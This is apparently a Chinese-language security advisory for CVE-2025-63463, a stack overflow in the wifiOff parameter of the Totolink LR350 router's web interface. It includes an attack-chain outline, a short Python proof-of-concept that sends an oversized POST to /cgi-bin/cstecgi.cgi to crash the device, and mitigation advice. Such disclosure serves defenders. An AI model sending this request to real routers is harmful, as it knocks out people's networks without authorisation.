CVE-2025-63463 Totolink LR350 wifiOff参数栈溢出漏洞导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-63463

漏洞类型

栈溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink LR350

漏洞概述

CVE-2025-63463是影响Totolink LR350路由器固件v9.3.5u.6369_B20220309的一个高危安全漏洞。该漏洞存在于设备的Web管理界面中，攻击者通过构造恶意的wifiOff参数可以触发栈溢出条件。由于该漏洞位于sub_4232EC函数中，攻击者可以利用此漏洞覆盖栈上的返回地址和关键变量，从而执行任意代码或导致设备崩溃。由于CVSS评分高达7.5且攻击复杂度低，远程未认证攻击者可以通过网络直接发起攻击，无需任何用户交互即可造成设备拒绝服务。此漏洞影响了路由器的无线网络管理功能，攻击成功后可导致无线服务中断，影响企业或家庭网络的正常运行。

技术细节

该漏洞为典型的栈溢出（Stack Overflow）漏洞，存在于Totolink LR350路由器的固件Web服务模块中。具体漏洞点位于处理wifiOff参数的sub_4232EC函数。当设备接收到包含过长wifiOff参数的HTTP请求时，该函数未对输入数据进行充分的边界检查直接将数据写入栈缓冲区。由于目标缓冲区大小固定，攻击者可以通过发送超长字符串覆盖相邻的栈内存区域，包括保存的返回地址、基址寄存器和函数参数。攻击者精心构造的Payload可以覆盖返回地址，将程序执行流重定向到恶意代码所在位置，从而实现远程代码执行。若攻击者仅发送导致栈损坏但不含恶意跳转指令的数据包，则会导致程序执行异常，最终引发崩溃，实现拒绝服务攻击。

攻击链分析

STEP 1

步骤1

扫描识别目标：攻击者扫描网络发现运行v9.3.5u.6369_B20220309固件的Totolink LR350设备

STEP 2

步骤2

发送恶意请求：构造包含超长wifiOff参数的HTTP POST请求到/cgi-bin/cstecgi.cgi端点

STEP 3

步骤3

触发栈溢出：超长参数数据溢出sub_4232EC函数中的栈缓冲区，覆盖返回地址

STEP 4

步骤4

代码执行或崩溃：攻击者可利用返回地址覆盖执行任意代码，或直接导致程序崩溃

STEP 5

步骤5

造成拒绝服务：设备无线网络服务中断，需要人工重启或恢复固件才能恢复正常

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-63463 PoC - Totolink LR350 Stack Overflow
# Target: wifiOff parameter in sub_4232EC function

target_ip = "192.168.1.1"
target_port = 80
target_url = f"http://{target_ip}:{target_port}/cgi-bin/cstecgi.cgi"

# Generate malicious payload - 500 bytes to trigger overflow
# Original buffer size is likely around 200-300 bytes
payload_size = 500
malicious_payload = "A" * payload_size

# Build the exploit request
data = {
    "topicurl": "setWifiOff",
    "wifiOff": malicious_payload  # Overflow trigger parameter
}

print(f"[*] Sending exploit to {target_url}")
print(f"[*] Payload size: {payload_size} bytes")

try:
    response = requests.post(target_url, data=data, timeout=10)
    print(f"[*] Response Status: {response.status_code}")
    print("[*] Exploit sent - Target should crash or hang")
except requests.exceptions.RequestException as e:
    print(f"[!] Request failed: {e}")
    print("[*] Target may have crashed or is unresponsive")

影响范围

Totolink LR350 < v9.3.5u.6369_B20220309

Totolink LR350 v9.3.5u.6369_B20220309（确认受影响）

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解：1) 通过访问控制列表（ACL）限制对路由器Web管理界面的访问，仅允许受信任的IP地址访问；2) 禁用路由器的远程Web管理功能，仅允许通过本地网络访问；3) 监控设备日志，发现异常请求立即阻断；4) 考虑使用备用设备替换受影响的路由器；5) 在网络边界部署WAF/IPS设备对恶意请求进行过滤。